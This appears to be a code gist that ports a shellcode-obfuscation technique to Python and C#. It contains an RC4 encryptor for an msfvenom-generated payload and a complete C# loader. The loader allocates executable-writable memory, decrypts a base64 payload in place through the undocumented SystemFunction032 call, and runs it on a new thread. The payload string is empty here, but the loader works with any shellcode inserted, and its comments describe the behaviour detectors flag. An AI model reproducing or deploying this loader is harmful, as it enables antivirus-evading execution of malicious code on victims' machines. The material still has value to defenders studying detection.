A port of [ https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode ] to Python and C#
#!/usr/bin/env python3 | |
from typing import Iterator | |
from base64 import b64encode | |
# Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071 | |
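def key_scheduling(key: bytes) -> list[int]:
    """RC4 key-scheduling algorithm (KSA).

    Builds the initial 256-entry permutation from ``key``. The key is
    cycled byte-by-byte over the 256 positions, so any non-empty length
    works mathematically (RC4 keys are conventionally 1..256 bytes).

    Args:
        key: Secret key bytes; must be non-empty.

    Returns:
        A list of 256 ints holding a permutation of 0..255.

    Raises:
        ValueError: If ``key`` is empty. The original surfaced this as a
            ZeroDivisionError from ``j % len(key)``, which hid the cause.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    sched = list(range(256))
    acc = 0
    for pos in range(256):
        # Fold in the next (cycled) key byte, then swap the two entries.
        acc = (acc + sched[pos] + key[pos % len(key)]) % 256
        sched[pos], sched[acc] = sched[acc], sched[pos]
    return sched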
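def stream_generation(sched: list[int]) -> Iterator[int]:
    """RC4 pseudo-random generation algorithm (PRGA).

    Yields one key-stream byte per iteration, forever. The return
    annotation was ``Iterator[bytes]`` but each yielded value is an int
    in 0..255, which is what ``encrypt`` XORs against.

    Args:
        sched: The 256-entry permutation from ``key_scheduling``. It is
            mutated in place as the generator advances, so one schedule
            must not be shared between two generators.

    Yields:
        Key-stream bytes as ints.
    """
    i = j = 0
    while True:
        i = (i + 1) % 256
        j = (j + sched[i]) % 256
        sched[i], sched[j] = sched[j], sched[i]
        yield sched[(sched[i] + sched[j]) % 256]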
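def encrypt(plaintext: bytes, key: bytes) -> bytes:
    """RC4-transform ``plaintext`` under ``key``.

    RC4 is symmetric, so the same call decrypts. An empty ``plaintext``
    returns ``b''``.

    Args:
        plaintext: Input bytes.
        key: RC4 key handed to ``key_scheduling`` (must be non-empty).

    Returns:
        ``plaintext`` XORed with the RC4 key stream; same length as the input.

    Note:
        RC4 is cryptographically broken and provides no integrity check;
        reusing a key also reuses the key stream. Treat this as
        obfuscation, not as protection of the data.
    """
    key_stream = stream_generation(key_scheduling(key))
    # bytes() over a generator is linear; the original appended one-byte
    # objects to a bytes value in a loop, copying the growing buffer each time.
    return bytes(byte ^ next(key_stream) for byte in plaintext)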
if __name__ == '__main__':
    # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
    # Reads the raw payload file, RC4-encrypts it with the fixed key and
    # prints the base64 form on stdout.
    key = b'aaaaaaaaaaaaaaaa'
    with open('calc.bin', 'rb') as payload_file:
        payload = payload_file.read()
    encoded = b64encode(encrypt(plaintext=payload, key=key))
    print(encoded.decode())
using System; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
namespace RunShellcodeRC4
{
    /// <summary>
    /// Proof-of-concept loader: copies a base64 blob into a freshly allocated
    /// RWX page, RC4-transforms it in place through the undocumented advapi32
    /// export SystemFunction032, and starts a thread at the page's base address.
    /// From a detection standpoint the sequence
    /// VirtualAlloc(PAGE_EXECUTE_READWRITE) -> Marshal.Copy -> CreateThread with a
    /// start address in private (non-image) memory is the behaviour to alert on;
    /// the RC4 step only hides the payload bytes at rest.
    /// </summary>
    public class Program
    {
        // kernel32!VirtualAlloc: reserves/commits memory in the current process.
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        // kernel32!CreateThread: lpStartAddress becomes the new thread's entry point.
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        // kernel32!WaitForSingleObject: blocks until the handle is signalled or the timeout elapses.
        [DllImport("kernel32.dll")]
        static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

        // advapi32!SystemFunction032 is the undocumented RC4 routine (encrypt and
        // decrypt are the same operation). It is not declared in the public SDK
        // headers, hence the explicit EntryPoint and the hand-written struct below.
        [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = false, EntryPoint = "SystemFunction032")]
        static extern int SystemFunction032(ref CRYPTO_BUFFER data, ref CRYPTO_BUFFER key);

        // USTRING-style counted-buffer descriptor used for both the data and the key:
        // byte length, capacity, and a pointer to the bytes.
        [StructLayout(LayoutKind.Sequential)]
        struct CRYPTO_BUFFER
        {
            public uint Length;
            public uint MaximumLength;
            public IntPtr Buffer;
        }

        // Stolen from: https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/0e3dcfd55be8ac5fde1631d0f50753a761927082/MakeMeEnterpriseAdmin.ps1#L98-L125
        /// <summary>
        /// RC4-transforms <paramref name="lengh"/> bytes at <paramref name="input"/> in place
        /// with <paramref name="key"/> by calling SystemFunction032.
        /// </summary>
        /// <param name="input">Pointer to the unmanaged buffer that is rewritten in place.</param>
        /// <param name="key">RC4 key bytes; copied to a temporary unmanaged buffer for the call and freed afterwards.</param>
        /// <param name="lengh">Number of bytes at <paramref name="input"/> to transform (spelling kept as in the original).</param>
        /// <returns>The raw status returned by SystemFunction032; the caller in this file discards it.</returns>
        static int RtlEncryptDecryptRC4(IntPtr input, byte[] key, int lengh)
        {
            // Data descriptor points straight at the caller's buffer: no copy, transformed in place.
            CRYPTO_BUFFER dataBuffer = new CRYPTO_BUFFER();
            dataBuffer.Length = dataBuffer.MaximumLength = (uint)lengh;
            dataBuffer.Buffer = input;

            // The key must live in unmanaged memory for the duration of the call.
            CRYPTO_BUFFER keyBuffer = new CRYPTO_BUFFER();
            keyBuffer.Length = keyBuffer.MaximumLength = (uint)key.Length;
            keyBuffer.Buffer = Marshal.AllocHGlobal(key.Length);
            Marshal.Copy(key, 0, keyBuffer.Buffer, key.Length);

            int ret = SystemFunction032(ref dataBuffer, ref keyBuffer);

            // Release the key copy; note it is freed but not zeroed first.
            Marshal.FreeHGlobal(keyBuffer.Buffer);
            return ret;
        }

        /// <summary>
        /// Entry point: allocate an RWX page, copy the (empty, as committed) blob into
        /// it, RC4-transform it in place with the same 16-byte key the Python
        /// encryptor uses, and run it on a new thread until that thread exits.
        /// </summary>
        public static void Main()
        {
            // Same key string as the Python side, so its output round-trips here.
            var key = Encoding.UTF8.GetBytes("aaaaaaaaaaaaaaaa");
            // Empty in this revision, so buf.Length is 0 and nothing is copied or run.
            var buf = Convert.FromBase64String("");
            // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
            // one 4 KiB page that is writable and executable at the same time.
            IntPtr alloc = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            Marshal.Copy(buf, 0, alloc, buf.Length);
            // Transform in place; the status code is discarded.
            _ = RtlEncryptDecryptRC4(alloc, key, buf.Length);
            // dwCreationFlags 0: the thread starts immediately at alloc; no thread id is requested.
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, IntPtr.Zero);
            // 0xFFFFFFFF = INFINITE: block until the thread finishes.
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}